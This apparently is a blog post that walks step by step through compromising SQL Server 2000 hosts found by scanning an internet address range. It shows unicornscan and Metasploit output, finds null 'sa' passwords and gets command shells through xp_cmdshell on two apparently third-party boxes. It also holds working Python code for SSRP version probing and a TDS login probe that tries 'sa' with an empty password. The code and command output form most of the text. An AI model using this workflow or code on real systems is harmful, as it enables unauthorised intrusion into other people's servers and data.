Rule #2: don't have a null sa account, especially if you are violating rule #1...
let's see...
Use unicornscan to search for hosts with TCP port 1433 open:
cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p
Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108
Run the hosts that responded through the msf auxiliary module mssql_ping to see if we can get any version information. I'll omit the ones that didn't respond.
cg@segfault:~/evil/msf3$ ./msfconsole
=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux
msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info
Name: MSSQL Ping Utility
Version: 4419
Provided by:
MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the MSSQL instance for information.
msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
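What mssql_ping is doing on the wire is a SQL Server Resolution Protocol (SSRP) query: a single 0x02 byte to UDP/1434, answered with a 0x05 byte, a 16-bit length and a semicolon-delimited string carrying exactly the fields printed above. The script below is an added example, not the Metasploit module's code: it parses that reply, maps the Version field to a product using the prefixes from the version chart linked at the end of the post, and can also send the query itself. The sample datagram is constructed here to match the A.B.X.28 output, not captured traffic.

```python
import socket

SSRP_PORT = 1434            # SQL Server Resolution Protocol listens on UDP/1434
CLNT_UCAST_EX = b"\x02"     # request: describe every instance on the host
SVR_RESP = 0x05             # first byte of the server's reply

# Major.minor prefixes, per the SQL Server version chart linked below.
PRODUCT_BY_PREFIX = {
    "7.00": "SQL Server 7.0", "8.00": "SQL Server 2000", "9.00": "SQL Server 2005",
    "10.00": "SQL Server 2008", "10.50": "SQL Server 2008 R2", "11.00": "SQL Server 2012",
}


def build_svr_resp(text: str) -> bytes:
    """Encode a reply the way the server does: 0x05, 16-bit LE length, text.
    Used here only to fabricate a sample datagram for offline testing."""
    raw = text.encode("latin-1")
    return bytes([SVR_RESP]) + len(raw).to_bytes(2, "little") + raw


def parse_ssrp_response(data: bytes) -> list:
    """Turn an SVR_RESP datagram into one dict per instance.
    The body is 'key;value;key;value;...' and each instance ends with ';;'."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP datagram")
    size = int.from_bytes(data[1:3], "little")
    body = data[3:3 + size].decode("latin-1")
    instances = []
    for chunk in body.split(";;"):
        fields = chunk.split(";")
        if len(fields) < 2:
            continue                # trailing empty chunk after the final ';;'
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def product_name(version: str) -> str:
    """Map '8.00.194' -> 'SQL Server 2000' using the major.minor prefix."""
    prefix = ".".join(version.split(".")[:2])
    return PRODUCT_BY_PREFIX.get(prefix, "unknown build " + version)


def ssrp_ping(host: str, timeout: float = 3.0) -> list:
    """Send CLNT_UCAST_EX to UDP/1434 and parse whatever comes back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, SSRP_PORT))
        data, _ = s.recvfrom(65535)
    return parse_ssrp_response(data)


# Constructed sample (not captured), shaped like the reply from A.B.X.28 above.
SAMPLE_DATAGRAM = build_svr_resp(
    "ServerName;JADER;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;8.00.194;tcp;1433;np;\\\\JADER\\pipe\\sql\\query;;"
)

if __name__ == "__main__":
    import sys
    hits = ssrp_ping(sys.argv[1]) if len(sys.argv) > 1 else parse_ssrp_response(SAMPLE_DATAGRAM)
    for inst in hits:
        print(f"{inst.get('ServerName')}\\{inst.get('InstanceName')} "
              f"tcp={inst.get('tcp')} version={inst.get('Version')} "
              f"({product_name(inst.get('Version', ''))})")
```

Run it with a host argument to query a live box, or with no argument to parse the built-in sample. A host running several instances answers with several `;;`-terminated records in one datagram, which is why the parser returns a list rather than a single dict.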
All three report 8.00.194, which per the version chart linked below is SQL Server 2000 RTM with no service pack. Now, let's run them through mssql_login to look for any that have null sa accounts.
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info
Name: MSSQL Login Utility
Version: 4749
Provided by:
MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the MSSQL instance for a null SA account.
msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed
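At the protocol level the null-sa check is one TDS LOGIN7 message for user `sa` with an empty password, followed by a look at the reply for a LOGINACK token (success) or an ERROR token (typically 18456, login failed). The code below is an added example, not the mssql_login module's implementation. It assumes TDS 7.0, the dialect SQL Server 2000 speaks, which needs no PRELOGIN handshake, and that the login reply fits in a single packet; the two sample replies are constructed for offline testing, not captured from a server. The hostname `probe` and application name `nullsa` are arbitrary.

```python
import socket
import struct

TDS_LOGIN7 = 0x10            # packet type of the LOGIN7 message
TDS_EOM = 0x01               # status bit: end of message
TDS_VERSION_70 = 0x70000000  # TDS 7.0, what SQL Server 2000 speaks

TOK_LOGINACK, TOK_ERROR, TOK_INFO, TOK_ENVCHANGE = 0xAD, 0xAA, 0xAB, 0xE3
TOK_DONE = {0xFD, 0xFE, 0xFF}


def obfuscate_password(password: str) -> bytes:
    """TDS 'encrypts' the LOGIN7 password by swapping the nibbles of every
    UCS-2LE byte and XORing with 0xA5. It is fixed and reversible, so a
    sniffer recovers the password; it is not protection."""
    out = bytearray()
    for b in password.encode("utf-16-le"):
        out.append((((b << 4) & 0xF0) | (b >> 4)) ^ 0xA5)
    return bytes(out)


def build_login7(user: str, password: str, host: str = "probe",
                 app: str = "nullsa", server: str = "") -> bytes:
    """Build a complete TDS 7.0 LOGIN7 packet (8-byte header + payload)."""
    fixed = 86  # size of the fixed part of a TDS 7.0 LOGIN7 payload
    # hostname, username, password, appname, servername, unused, libname, language, database
    strings = [host, user, password, app, server, "", "nullsa", "", ""]
    var, offsets = bytearray(), []
    for i, s in enumerate(strings):
        data = obfuscate_password(s) if i == 2 else s.encode("utf-16-le")
        offsets.append((fixed + len(var), len(s)))   # offset in bytes, length in chars
        var += data
    payload = bytearray()
    payload += struct.pack("<IIIIII", 0, TDS_VERSION_70, 4096, 0, 0, 0)  # len (patched), version, pkt size, prog ver, pid, conn id
    payload += bytes([0x00, 0x00, 0x00, 0x00])      # OptionFlags1/2 (SQL auth), TypeFlags, OptionFlags3
    payload += struct.pack("<iI", 0, 0x409)         # client time zone, LCID en-US
    for off, ln in offsets:
        payload += struct.pack("<HH", off, ln)
    payload += b"\x00" * 6                          # ClientID (MAC), unused here
    payload += struct.pack("<HH", fixed + len(var), 0)  # SSPI: none
    payload += struct.pack("<HH", fixed + len(var), 0)  # AtchDBFile: none
    assert len(payload) == fixed
    payload += var
    struct.pack_into("<I", payload, 0, len(payload))
    header = struct.pack(">BBHHBB", TDS_LOGIN7, TDS_EOM, 8 + len(payload), 0, 1, 0)
    return header + bytes(payload)


def parse_login_response(data: bytes):
    """Walk the token stream of a login reply. Returns (ok, message)."""
    pos = 8  # skip the TDS packet header
    while pos < len(data):
        tok = data[pos]
        pos += 1
        if tok == TOK_LOGINACK:
            return True, "login accepted"
        if tok in TOK_DONE or tok not in (TOK_ERROR, TOK_INFO, TOK_ENVCHANGE):
            break                                   # DONE, or a token we do not know how to skip
        length = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        body = data[pos:pos + length]
        pos += length
        if tok == TOK_ERROR:                        # Number(4) State(1) Class(1) MsgLen(2) MsgText
            number = struct.unpack_from("<I", body, 0)[0]
            nchars = struct.unpack_from("<H", body, 6)[0]
            return False, f"error {number}: {body[8:8 + 2 * nchars].decode('utf-16-le')}"
    return False, "no LOGINACK in reply"


def probe_null_sa(host: str, port: int = 1433, timeout: float = 5.0):
    """Connect and try user 'sa' with an empty password."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_login7("sa", "", server=host))
        return parse_login_response(s.recv(4096))


def make_sample_reply(ok: bool) -> bytes:
    """Constructed sample replies (not captured traffic) for offline testing:
    LOGINACK + DONE, or ERROR 18456 + DONE, in TDS 7.0 form."""
    if ok:
        prog = "Microsoft SQL Server".encode("utf-16-le")
        body = bytes([1]) + struct.pack("<I", TDS_VERSION_70) + bytes([len(prog) // 2]) + prog + bytes([8, 0, 0, 194])
        tok = bytes([TOK_LOGINACK]) + struct.pack("<H", len(body)) + body
    else:
        text = "Login failed for user 'sa'.".encode("utf-16-le")
        srv = "JADER".encode("utf-16-le")
        body = (struct.pack("<IBB", 18456, 1, 14) + struct.pack("<H", len(text) // 2) + text
                + bytes([len(srv) // 2]) + srv + bytes([0]) + struct.pack("<H", 1))
        tok = bytes([TOK_ERROR]) + struct.pack("<H", len(body)) + body
    stream = tok + bytes([0xFD]) + struct.pack("<HHI", 0, 0, 0)
    return struct.pack(">BBHHBB", 0x04, TDS_EOM, 8 + len(stream), 0, 1, 0) + stream


if __name__ == "__main__":
    import sys
    print(probe_null_sa(sys.argv[1]) if len(sys.argv) > 1 else parse_login_response(make_sample_reply(False)))
```

Because the password obfuscation is a fixed transform and TDS 7.0 carries no transport encryption, every sa login a SQL Server 2000 box accepts over the internet is also readable by anyone on the path; that is the other half of why rule #1 matters.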
Then let's use sqlcmd (the sqlcmd.c linked below, not Microsoft's sqlcmd) to see if we can get a command shell on the box. It runs each line through xp_cmdshell, which SQL Server 2000 leaves enabled for sa out of the box; SQL Server 2005 and later ship with it disabled until someone turns it back on with sp_configure.
cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C
sqlcmd> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Media State . . . . . . . . . . . : Media disconnected
Ethernet adapter Wireless Network Connection:
Media State . . . . . . . . . . . : Media disconnected
PPP adapter POP:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : A.B.X.28
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : A.B.X.28
and on the other box:
cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C
sqlcmd> ipconfig
Windows IP Configuration
Ethernet adapter Local:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.2.5
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter remoto:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.2.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
The first box is sitting on a PPP dial-up link and the second only has RFC 1918 addresses, so its port 1433 is being forwarded in through something at 192.168.2.1. TFTP was available on both boxes for some old-school, year-2000 "tftp upload your tools" fun.
Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions
sqlcmd.c: http://excluded.wgv.at/codedstuff.php
metasploit (like you need the link): http://framework.metasploit.com/
-CG
2 comments:
honeypots?
Perhaps...
In this day and age you can probably assume that if you got in with some old-school exploit it is probably a honeypot.